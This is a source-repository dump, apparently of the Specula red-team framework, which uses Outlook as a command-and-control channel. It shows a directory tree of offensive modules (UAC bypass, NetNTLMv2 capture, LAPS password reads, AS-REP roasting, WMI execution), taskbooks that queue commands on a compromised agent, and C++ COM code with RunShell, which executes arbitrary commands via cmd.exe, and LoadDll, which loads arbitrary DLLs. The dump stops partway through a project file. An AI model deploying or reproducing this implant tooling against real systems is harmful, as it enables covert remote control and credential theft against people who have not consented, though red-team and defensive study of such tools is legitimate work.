Showing preview only (635K chars total). Download the full file or copy to clipboard to get everything.
Repository: trustedsec/specula
Branch: main
Commit: 2b913314d10f
Files: 312
Total size: 560.7 KB
Directory structure:
gitextract_vdz89222/
├── .gitignore
├── CONTRIBUTING.md
├── README.md
├── Taskbooks/
│ ├── enum_installed_software.py
│ └── example.py
├── api/
│ ├── README.md
│ ├── SpeculaApi/
│ │ ├── Sepcula.cpp
│ │ ├── Sepcula.h
│ │ ├── Sepcula.rgs
│ │ ├── SpeculaApi.cpp
│ │ ├── SpeculaApi.def
│ │ ├── SpeculaApi.idl
│ │ ├── SpeculaApi.rc
│ │ ├── SpeculaApi.rgs
│ │ ├── SpeculaApi.vcxproj
│ │ ├── SpeculaApi.vcxproj.filters
│ │ ├── SpeculaApi_i.h
│ │ ├── SpeculaApips.def
│ │ ├── dllmain.cpp
│ │ ├── dllmain.h
│ │ ├── framework.h
│ │ ├── pch.cpp
│ │ ├── pch.h
│ │ ├── resource.h
│ │ └── targetver.h
│ ├── SpeculaApi.sln
│ └── SpeculaApiPS/
│ ├── SpeculaApiPS.vcxproj
│ └── SpeculaApiPS.vcxproj.filters
├── functions/
│ ├── api/
│ │ ├── install_api.py
│ │ ├── install_api.txt
│ │ ├── load_dll.py
│ │ ├── load_dll.txt
│ │ ├── remove_api.py
│ │ ├── remove_api.txt
│ │ ├── run_shell.py
│ │ ├── run_shell.txt
│ │ ├── verify_api.py
│ │ └── verify_api.txt
│ ├── enumerate/
│ │ ├── host/
│ │ │ ├── list_amsiproviders.py
│ │ │ ├── list_amsiproviders.txt
│ │ │ ├── list_applocker.py
│ │ │ ├── list_applocker.txt
│ │ │ ├── list_autoruns.py
│ │ │ ├── list_autoruns.txt
│ │ │ ├── list_basic.py
│ │ │ ├── list_basic.txt
│ │ │ ├── list_boottime.py
│ │ │ ├── list_boottime.txt
│ │ │ ├── list_clipboard.py
│ │ │ ├── list_clipboard.txt
│ │ │ ├── list_environmentvariables.py
│ │ │ ├── list_environmentvariables.txt
│ │ │ ├── list_gpp.py
│ │ │ ├── list_gpp.txt
│ │ │ ├── list_hostsfile.py
│ │ │ ├── list_hostsfile.txt
│ │ │ ├── list_hotfixes.py
│ │ │ ├── list_hotfixes.txt
│ │ │ ├── list_installedapps.py
│ │ │ ├── list_installedapps.txt
│ │ │ ├── list_installeddotnet.py
│ │ │ ├── list_installeddotnet.txt
│ │ │ ├── list_installedpowershell.py
│ │ │ ├── list_installedpowershell.txt
│ │ │ ├── list_iprouting.py
│ │ │ ├── list_iprouting.txt
│ │ │ ├── list_localadmins.py
│ │ │ ├── list_localadmins.txt
│ │ │ ├── list_localusers.py
│ │ │ ├── list_localusers.txt
│ │ │ ├── list_logging.py
│ │ │ ├── list_logging.txt
│ │ │ ├── list_mappeddrives.py
│ │ │ ├── list_mappeddrives.txt
│ │ │ ├── list_networkcardinfo.py
│ │ │ ├── list_networkcardinfo.txt
│ │ │ ├── list_networklogon.py
│ │ │ ├── list_networklogon.txt
│ │ │ ├── list_ntdomaininfo.py
│ │ │ ├── list_ntdomaininfo.txt
│ │ │ ├── list_officearch.py
│ │ │ ├── list_officearch.txt
│ │ │ ├── list_printers.py
│ │ │ ├── list_printers.txt
│ │ │ ├── list_processes.py
│ │ │ ├── list_processes.txt
│ │ │ ├── list_recentcommands.py
│ │ │ ├── list_recentcommands.txt
│ │ │ ├── list_recentfiles.py
│ │ │ ├── list_recentfiles.txt
│ │ │ ├── list_recyclebin.py
│ │ │ ├── list_recyclebin.txt
│ │ │ ├── list_scheduledtasks.py
│ │ │ ├── list_scheduledtasks.txt
│ │ │ ├── list_servicepermissions.py
│ │ │ ├── list_servicepermissions.txt
│ │ │ ├── list_services.py
│ │ │ ├── list_services.txt
│ │ │ ├── list_startmenu.py
│ │ │ ├── list_startmenu.txt
│ │ │ ├── list_timezone.py
│ │ │ ├── list_timezone.txt
│ │ │ ├── list_whoami.py
│ │ │ ├── list_whoami.txt
│ │ │ ├── list_windowsarch.py
│ │ │ ├── list_windowsarch.txt
│ │ │ ├── list_windowsversion.py
│ │ │ └── list_windowsversion.txt
│ │ └── ldap/
│ │ ├── ldap_query.py
│ │ ├── ldap_query.txt
│ │ ├── list_addcomputertodomain.py
│ │ ├── list_addcomputertodomain.txt
│ │ ├── list_asreproast.py
│ │ ├── list_asreproast.txt
│ │ ├── list_computer.py
│ │ ├── list_computer.txt
│ │ ├── list_computers.py
│ │ ├── list_computers.txt
│ │ ├── list_domaininfo.py
│ │ ├── list_domaininfo.txt
│ │ ├── list_lapspassword.py
│ │ ├── list_lapspassword.txt
│ │ ├── list_passwordnotrequired.py
│ │ ├── list_passwordnotrequired.txt
│ │ ├── list_passwordpolicy.py
│ │ ├── list_passwordpolicy.txt
│ │ ├── list_user.py
│ │ ├── list_user.txt
│ │ ├── list_users.py
│ │ └── list_users.txt
│ ├── execute/
│ │ └── host/
│ │ ├── application.py
│ │ ├── application.txt
│ │ ├── capture_netntlmv2.py
│ │ ├── capture_netntlmv2.txt
│ │ ├── cmd.py
│ │ ├── cmd.txt
│ │ ├── execute_excel4macro.py
│ │ ├── execute_excel4macro.txt
│ │ ├── execute_registerxll.py
│ │ ├── execute_registerxll.txt
│ │ ├── migrate_homepage.py
│ │ ├── migrate_homepage.txt
│ │ ├── remove_homepage.py
│ │ ├── remove_homepage.txt
│ │ ├── set_calendarhomepagehook.py
│ │ ├── set_calendarhomepagehook.txt
│ │ ├── spawnproc_explorer.py
│ │ ├── spawnproc_explorer.txt
│ │ ├── uac-sdclt.py
│ │ ├── uac-sdclt.txt
│ │ ├── wmi_execute.py
│ │ ├── wmi_execute.txt
│ │ ├── wmi_killprocname.py
│ │ ├── wmi_killprocname.txt
│ │ ├── wmi_killprocpid.py
│ │ ├── wmi_killprocpid.txt
│ │ ├── wscriptshell.py
│ │ └── wscriptshell.txt
│ ├── operation/
│ │ ├── file/
│ │ │ ├── cat_file.py
│ │ │ ├── cat_file.txt
│ │ │ ├── check_filearch.py
│ │ │ ├── check_filearch.txt
│ │ │ ├── check_fileexist.py
│ │ │ ├── check_fileexist.txt
│ │ │ ├── check_filehash.py
│ │ │ ├── check_filehash.txt
│ │ │ ├── copy_dir.py
│ │ │ ├── copy_dir.txt
│ │ │ ├── copy_file.py
│ │ │ ├── copy_file.txt
│ │ │ ├── create_dir.py
│ │ │ ├── create_dir.txt
│ │ │ ├── create_shortcut.py
│ │ │ ├── create_shortcut.txt
│ │ │ ├── delete_dir.py
│ │ │ ├── delete_dir.txt
│ │ │ ├── delete_file.py
│ │ │ ├── delete_file.txt
│ │ │ ├── download_filehttp.py
│ │ │ ├── download_filehttp.txt
│ │ │ ├── get_file.py
│ │ │ ├── get_file.txt
│ │ │ ├── list_acl.py
│ │ │ ├── list_acl.txt
│ │ │ ├── list_dir.py
│ │ │ ├── list_dir.txt
│ │ │ ├── list_shortcutinfo.py
│ │ │ ├── list_shortcutinfo.txt
│ │ │ ├── move_file.py
│ │ │ ├── move_file.txt
│ │ │ ├── put_file.py
│ │ │ ├── put_file.txt
│ │ │ ├── split_file.py
│ │ │ ├── split_file.txt
│ │ │ ├── zip_content.py
│ │ │ └── zip_content.txt
│ │ ├── network/
│ │ │ ├── netstat.py
│ │ │ ├── netstat.txt
│ │ │ ├── nslookup.py
│ │ │ └── nslookup.txt
│ │ ├── outlook/
│ │ │ ├── adjust_notifications.py
│ │ │ ├── adjust_notifications.txt
│ │ │ ├── change_outlookfolder.py
│ │ │ ├── change_outlookfolder.txt
│ │ │ ├── changeview_outlookfolder.py
│ │ │ ├── changeview_outlookfolder.txt
│ │ │ ├── delete_mail.py
│ │ │ ├── delete_mail.txt
│ │ │ ├── dump_gal.py
│ │ │ ├── dump_gal.txt
│ │ │ ├── get_emailaddress.py
│ │ │ ├── get_emailaddress.txt
│ │ │ ├── list_notifications.py
│ │ │ ├── list_notifications.txt
│ │ │ ├── list_overview.py
│ │ │ ├── list_overview.txt
│ │ │ ├── read_calendar.py
│ │ │ ├── read_calendar.txt
│ │ │ ├── read_contacts.py
│ │ │ ├── read_contacts.txt
│ │ │ ├── read_email.py
│ │ │ ├── read_email.txt
│ │ │ ├── read_emailnamedfolder.py
│ │ │ ├── read_emailnamedfolder.txt
│ │ │ ├── read_other.py
│ │ │ ├── read_other.txt
│ │ │ ├── savedraft_filemail.py
│ │ │ ├── savedraft_filemail.txt
│ │ │ ├── search_email.py
│ │ │ ├── search_email.txt
│ │ │ ├── send_mail.py
│ │ │ ├── send_mail.txt
│ │ │ ├── sendfile_mail.py
│ │ │ ├── sendfile_mail.txt
│ │ │ ├── stop_outlook.py
│ │ │ └── stop_outlook.txt
│ │ ├── registry/
│ │ │ ├── delkeyhkcuregistry.py
│ │ │ ├── delkeyhkcuregistry.txt
│ │ │ ├── delvaluehkcuregistry.py
│ │ │ ├── delvaluehkcuregistry.txt
│ │ │ ├── getallkeysregistry.py
│ │ │ ├── getallkeysregistry.txt
│ │ │ ├── getallvaluesregistry.py
│ │ │ ├── getallvaluesregistry.txt
│ │ │ ├── getvalueregistry.py
│ │ │ ├── getvalueregistry.txt
│ │ │ ├── setvaluehkcuregistry.py
│ │ │ └── setvaluehkcuregistry.txt
│ │ └── specula/
│ │ ├── remove_allowlongscriptruntime.py
│ │ ├── remove_allowlongscriptruntime.txt
│ │ ├── set_allowlongscriptruntime.py
│ │ └── set_allowlongscriptruntime.txt
│ └── trolling/
│ ├── play_voice.py
│ ├── play_voice.txt
│ ├── set_clipboard.py
│ └── set_clipboard.txt
├── helperFunctions/
│ ├── Delregkey_hkcu.txt
│ ├── Delregvalue_hkcu.txt
│ ├── Getallregkeys.txt
│ ├── Getallregvalues.txt
│ ├── Getregvalue.txt
│ ├── HexToBytes.txt
│ ├── Setregvalue_hkcu.txt
│ ├── base64.txt
│ ├── base_template.txt
│ ├── createstream.txt
│ ├── dir_creator.txt
│ ├── dir_lister.txt
│ └── supportFuncs.txt
├── hiddenFunctions/
│ ├── downloadGAL.py
│ ├── downloadGAL.txt
│ ├── download_file.py
│ ├── download_file.txt
│ ├── upload_file.py
│ └── upload_file.txt
├── hooker_generator.py
├── lib/
│ ├── core/
│ │ ├── helpers.py
│ │ ├── setup.py
│ │ ├── specagents.py
│ │ ├── specmodule.py
│ │ ├── specpayload.py
│ │ ├── spectaskbook.py
│ │ ├── utility.py
│ │ └── utils.py
│ ├── handlers/
│ │ ├── base.html
│ │ ├── blacklist.html
│ │ ├── dev_blank.html
│ │ ├── dev_encrypted_task_template.html
│ │ ├── dev_unencrypted_task_template.html
│ │ ├── redirect_template.html
│ │ ├── specapplication.py
│ │ ├── speccomms.py
│ │ ├── specdevcomms.py
│ │ ├── specpayload.py
│ │ ├── specvalidate.py
│ │ └── validation.html
│ ├── menu/
│ │ ├── specpromptdbedit.py
│ │ ├── specpromptexplorer.py
│ │ ├── specpromptinteract.py
│ │ ├── specpromptmodule.py
│ │ ├── specpromptpayload.py
│ │ ├── specpromptprestage.py
│ │ └── specpromptpushover.py
│ ├── modhandlers/
│ │ └── generic.py
│ ├── tab_completers/
│ │ └── generic.py
│ └── validators/
│ ├── files.py
│ └── generic.py
├── release_history.txt
├── requirements.txt
├── specula.py
└── ssl/
├── ssl-cert-snakeoil.key
└── ssl-cert-snakeoil.pem
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
*.db
configoptions.py
specConfig.ini
DefaultBlacklist.txt
.vscode/
specula_log.txt
weblog.log
operator_log.txt
agent_data/
payloadhosting/
venv/
*.pyc
================================================
FILE: CONTRIBUTING.md
================================================
# Contributions
If you are considering contributing to our repository, first thank you for doing so! </br>
Contributions from community members are more than welcome, there are a few items that you should be aware of for a smooth process </br>
At this time we will not be accepting new functional changes to the provided COM object. If you find an error in the
existing code we will accept a pull to fix that within the COM object.
## Technique Expectations
* Capabilities should run without causing outlook.exe to lock up.
* Capabilities should acount for errors that may occur and handle them
## Code Expectations
* python code should be coded to work from version 3.9 to 3.11
* Any additions to helperFunctions should be well-formed and usable from other vbs scripts
* Removal of intentionally placed IOC's will be rejected
* Again any updates to code under api/* should be error correcting in nature only, not feature additions.
## What to expect as a contributor
After your contribution is received, it will receive an in-depth code review and testing. </br>
After testing is completed, we will have zero or more rounds of change requests based on findings until there are no issues in the code. At that point it will be accepted into the repository, and your github username will be added to our credit list (if you would prefer not to be added or some other handle to be used, just let me know)
================================================
FILE: README.md
================================================
Getting started info and information for developing your own modules is available on the [wiki](https://github.com/trustedsec/specula/wiki)
================================================
FILE: Taskbooks/enum_installed_software.py
================================================
def TaskBook(helpers, agent):
mod = helpers.get_module('operation/file/list_dir')
helpers.setModOption(mod, 'directory', optval="c:\Program Files")
helpers.setModOption(mod, 'recurselevels', optval="0")
helpers.setModOption(mod, 'depth', optval="0")
helpers.setModOption(mod, 'filetype', optval="*")
helpers.setModOption(mod, 'filename', optval="*")
helpers.setModOption(mod, 'nodirectories', optval="False")
helpers.setModOption(mod, 'sizeformat', optval="mb")
helpers.setModOption(mod, 'nofiles', optval="True")
helpers.setModOption(mod, 'output_console', optval="False")
helpers.insertTask(agent, mod, 'operation/file/list_dir')
mod = helpers.get_module('operation/file/list_dir')
helpers.setModOption(mod, 'directory', optval="c:\Program Files (x86)")
helpers.setModOption(mod, 'recurselevels', optval="0")
helpers.setModOption(mod, 'depth', optval="0")
helpers.setModOption(mod, 'filetype', optval="*")
helpers.setModOption(mod, 'filename', optval="*")
helpers.setModOption(mod, 'nodirectories', optval="False")
helpers.setModOption(mod, 'sizeformat', optval="mb")
helpers.setModOption(mod, 'nofiles', optval="True")
helpers.setModOption(mod, 'output_console', optval="False")
helpers.insertTask(agent, mod, 'operation/file/list_dir')
mod = helpers.get_module('enumerate/host/list_installedapps')
helpers.insertTask(agent, mod, 'enumerate/host/list_installedapps')
================================================
FILE: Taskbooks/example.py
================================================
def TaskBook(helpers, agent):
mod = helpers.get_module('enumerate/host/list_applocker') # this doesn't take arguments, so we aren't giving it any
helpers.insertTask(agent, mod, 'enumerate/host/list_applocker')
mod = helpers.get_module('execute/host/cmd') # this does take an argument so we need to populate it
helpers.setModOption(mod, 'command', prompt="What command would you like to run: ")
helpers.insertTask(agent, mod, 'execute/host/cmd')
#we don't have to prompt for the input though
mod = helpers.get_module('operation/file/listdir')
helpers.setModOption(mod, 'strpath', optval="C:\Windows")
helpers.insertTask(agent, mod, 'operation/file/listdir')
================================================
FILE: api/README.md
================================================
# SpeculaApi
================================================
FILE: api/SpeculaApi/Sepcula.cpp
================================================
// Sepcula.cpp : Implementation of CSepcula
#include "pch.h"
#include "Sepcula.h"
#define BUFFERSIZE 4096
// CSepcula
STDMETHODIMP_(HRESULT __stdcall) CSepcula::RunShell(BSTR cmd, VARIANT timeout, BSTR * result)
{
CComBSTR errmsg{ L"Failed to run shell command" };
HRESULT hret = S_OK;
char outputbuffer[BUFFERSIZE];
CComBSTR totaloutput{};
DWORD availBytes = 0;
SECURITY_ATTRIBUTES saAttr;
saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
saAttr.bInheritHandle = TRUE;
saAttr.lpSecurityDescriptor = NULL;
HANDLE hChildStd_OUT_Rd = NULL;
HANDLE hChildStd_OUT_Wr = NULL;
// Create a pipe for the child process's STDOUT.
if (!CreatePipe(&hChildStd_OUT_Rd, &hChildStd_OUT_Wr, &saAttr, 0))
{
hret = HRESULT_FROM_WIN32(GetLastError());
errmsg.CopyTo(result);
return hret;
}
// Ensure the read handle to the pipe for STDOUT is not inherited.
if (!SetHandleInformation(hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0))
{
CloseHandle(hChildStd_OUT_Rd);
CloseHandle(hChildStd_OUT_Wr);
hret = HRESULT_FROM_WIN32(GetLastError());
errmsg.CopyTo(result);
return hret;
}
STARTUPINFO siStartInfo;
ZeroMemory(&siStartInfo, sizeof(STARTUPINFO));
siStartInfo.cb = sizeof(STARTUPINFO);
siStartInfo.hStdError = hChildStd_OUT_Wr;
siStartInfo.hStdOutput = hChildStd_OUT_Wr;
siStartInfo.dwFlags |= STARTF_USESTDHANDLES;
PROCESS_INFORMATION piProcInfo;
ZeroMemory(&piProcInfo, sizeof(PROCESS_INFORMATION));
CComBSTR fullcmd{ CmdProg };
fullcmd.Append(cmd);
// Create the child process.
if (!CreateProcessW(NULL,
fullcmd, // command line
NULL, // process security attributes
NULL, // primary thread security attributes
TRUE, // handles are inherited
0, // creation flags
NULL, // use parent's environment
NULL, // use parent's current directory
&siStartInfo, // STARTUPINFO pointer
&piProcInfo)) // receives PROCESS_INFORMATION
{
hret = HRESULT_FROM_WIN32(GetLastError());
errmsg.CopyTo(result);
CloseHandle(hChildStd_OUT_Rd);
CloseHandle(hChildStd_OUT_Wr);
return hret;
}
DWORD iterations = (timeout.vt == VT_I4) ? timeout.iVal : 60;
while (WaitForSingleObject(piProcInfo.hProcess, 1000) == WAIT_TIMEOUT && iterations)
{
availBytes = 0;
PeekNamedPipe(hChildStd_OUT_Rd, NULL, 0, NULL, &availBytes, NULL);
while (availBytes)
{
ZeroMemory(outputbuffer, sizeof(outputbuffer));
DWORD thisread = (availBytes >= BUFFERSIZE) ? BUFFERSIZE : availBytes;
DWORD read = 0;
ReadFile(hChildStd_OUT_Rd, (char*)outputbuffer, BUFFERSIZE, &read, NULL);
totaloutput.Append(outputbuffer);
availBytes -= read;
}
iterations--;
}
if (iterations == 0)
{
totaloutput.Append(L"\n\nProcess wait timed out");
}
else
{
availBytes = 0;
PeekNamedPipe(hChildStd_OUT_Rd, NULL, 0, NULL, &availBytes, NULL);
while (availBytes)
{
ZeroMemory(outputbuffer, sizeof(outputbuffer));
DWORD thisread = (availBytes >= BUFFERSIZE) ? BUFFERSIZE : availBytes;
DWORD read = 0;
ReadFile(hChildStd_OUT_Rd, (char*)outputbuffer, BUFFERSIZE, &read, NULL);
totaloutput.Append(outputbuffer);
availBytes -= read;
}
}
totaloutput.CopyTo(result);
CloseHandle(hChildStd_OUT_Rd);
CloseHandle(hChildStd_OUT_Wr);
return hret;
}
STDMETHODIMP_(HRESULT __stdcall) CSepcula::LoadDll(BSTR path, boolean persist, boolean* status)
{
HMODULE mod = LoadLibraryW(path);
*status = false;
if (mod == nullptr)
{
return HRESULT_FROM_WIN32(GetLastError());
}
if (!persist)
{
FreeLibrary(mod);
}
*status = true;
return S_OK;
}
================================================
FILE: api/SpeculaApi/Sepcula.h
================================================
// Sepcula.h : Declaration of the CSepcula
#pragma once
#include "resource.h" // main symbols
#include "SpeculaApi_i.h"
using namespace ATL;
// CSepcula
class ATL_NO_VTABLE CSepcula :
public CComObjectRootEx<CComMultiThreadModel>,
public CComCoClass<CSepcula, &CLSID_Sepcula>,
public IDispatchImpl<ISepcula, &IID_ISepcula, &LIBID_SpeculaApiLib, /*wMajor =*/ 1, /*wMinor =*/ 0>
{
public:
CSepcula()
{
}
DECLARE_REGISTRY_RESOURCEID(IDR_SEPCULA)
BEGIN_COM_MAP(CSepcula)
COM_INTERFACE_ENTRY(ISepcula)
COM_INTERFACE_ENTRY(IDispatch)
END_COM_MAP()
DECLARE_PROTECT_FINAL_CONSTRUCT()
HRESULT FinalConstruct()
{
return S_OK;
}
void FinalRelease()
{
}
public:
STDMETHOD(RunShell)(BSTR cmd, VARIANT timeout, BSTR * result);
STDMETHOD(LoadDll)(BSTR path, boolean persist, boolean* status);
private:
CComBSTR CmdProg{L"C:\\Windows\\system32\\cmd.exe /c "};
};
OBJECT_ENTRY_AUTO(__uuidof(Sepcula), CSepcula)
================================================
FILE: api/SpeculaApi/Sepcula.rgs
================================================
HKCR
{
SpeculaApi.Specula.1 = s 'Specula class'
{
CLSID = s '{e8b55279-c6b4-48f3-8138-b727337c0236}'
}
SpeculaApi.Specula = s 'Specula class'
{
CurVer = s 'SpeculaApi.Specula.1'
}
NoRemove CLSID
{
ForceRemove {e8b55279-c6b4-48f3-8138-b727337c0236} = s 'Specula class'
{
ProgID = s 'SpeculaApi.Specula.1'
VersionIndependentProgID = s 'SpeculaApi.Specula'
ForceRemove Programmable
InprocServer32 = s '%MODULE%'
{
val ThreadingModel = s 'Free'
}
TypeLib = s '{5be8ef76-6253-482a-926e-d1d877de3b63}'
Version = s '1.0'
}
}
}
================================================
FILE: api/SpeculaApi/SpeculaApi.cpp
================================================
// SpeculaApi.cpp : Implementation of DLL Exports.
#include "pch.h"
#include "framework.h"
#include "resource.h"
#include "SpeculaApi_i.h"
#include "dllmain.h"
using namespace ATL;
// Used to determine whether the DLL can be unloaded by OLE.
_Use_decl_annotations_
STDAPI DllCanUnloadNow(void)
{
return _AtlModule.DllCanUnloadNow();
}
// Returns a class factory to create an object of the requested type.
_Use_decl_annotations_
STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID* ppv)
{
return _AtlModule.DllGetClassObject(rclsid, riid, ppv);
}
// DllRegisterServer - Adds entries to the system registry.
_Use_decl_annotations_
STDAPI DllRegisterServer(void)
{
// registers object, typelib and all interfaces in typelib
HRESULT hr = _AtlModule.DllRegisterServer();
return hr;
}
// DllUnregisterServer - Removes entries from the system registry.
_Use_decl_annotations_
STDAPI DllUnregisterServer(void)
{
HRESULT hr = _AtlModule.DllUnregisterServer();
return hr;
}
// DllInstall - Adds/Removes entries to the system registry per user per machine.
STDAPI DllInstall(BOOL bInstall, _In_opt_ LPCWSTR pszCmdLine)
{
HRESULT hr = E_FAIL;
static const wchar_t szUserSwitch[] = L"user";
if (pszCmdLine != nullptr)
{
if (_wcsnicmp(pszCmdLine, szUserSwitch, _countof(szUserSwitch)) == 0)
{
ATL::AtlSetPerUserRegistration(true);
}
}
if (bInstall)
{
hr = DllRegisterServer();
if (FAILED(hr))
{
DllUnregisterServer();
}
}
else
{
hr = DllUnregisterServer();
}
return hr;
}
================================================
FILE: api/SpeculaApi/SpeculaApi.def
================================================
; SpeculaApi.def : Declares the module parameters.
LIBRARY
EXPORTS
DllCanUnloadNow PRIVATE
DllGetClassObject PRIVATE
DllRegisterServer PRIVATE
DllUnregisterServer PRIVATE
DllInstall PRIVATE
================================================
FILE: api/SpeculaApi/SpeculaApi.idl
================================================
// SpeculaApi.idl : IDL source for SpeculaApi
//
// This file will be processed by the MIDL tool to
// produce the type library (SpeculaApi.tlb) and marshalling code.
import "oaidl.idl";
import "ocidl.idl";
[
object,
uuid(b0f5f947-8064-48f7-a623-5c058dc91cc8),
dual,
nonextensible,
pointer_default(unique)
]
interface ISepcula : IDispatch
{
[id(1)] HRESULT RunShell([in] BSTR cmd, [in, optional] VARIANT timeout, [out, retval] BSTR* result);
[id(2)] HRESULT LoadDll([in] BSTR path, [in] boolean persist, [out, retval] boolean* status);
};
[
uuid(5be8ef76-6253-482a-926e-d1d877de3b63),
version(1.0),
]
library SpeculaApiLib
{
importlib("stdole2.tlb");
[
uuid(e8b55279-c6b4-48f3-8138-b727337c0236)
]
coclass Sepcula
{
[default] interface ISepcula;
};
};
import "shobjidl.idl";
================================================
FILE: api/SpeculaApi/SpeculaApi.rgs
================================================
HKCR
{
}
================================================
FILE: api/SpeculaApi/SpeculaApi.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>17.0</VCProjectVersion>
<ProjectGuid>{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}</ProjectGuid>
<Keyword>AtlProj</Keyword>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)bin\</OutDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)bin\</OutDir>
<TargetName>$(ProjectName).x64</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>_WINDOWS;_DEBUG;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<HeaderFileName>SpeculaApi_i.h</HeaderFileName>
<InterfaceIdentifierFileName>SpeculaApi_i.c</InterfaceIdentifierFileName>
<ProxyFileName>SpeculaApi_p.c</ProxyFileName>
<GenerateStublessProxies>true</GenerateStublessProxies>
<TypeLibraryName>$(IntDir)SpeculaApi.tlb</TypeLibraryName>
<DllDataFileName />
<ValidateAllParameters>true</ValidateAllParameters>
</Midl>
<ResourceCompile>
<Culture>0x0409</Culture>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<SubSystem>Windows</SubSystem>
<ModuleDefinitionFile>.\SpeculaApi.def</ModuleDefinitionFile>
<RegisterOutput>true</RegisterOutput>
<PerUserRedirection>true</PerUserRedirection>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_WINDOWS;_DEBUG;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Midl>
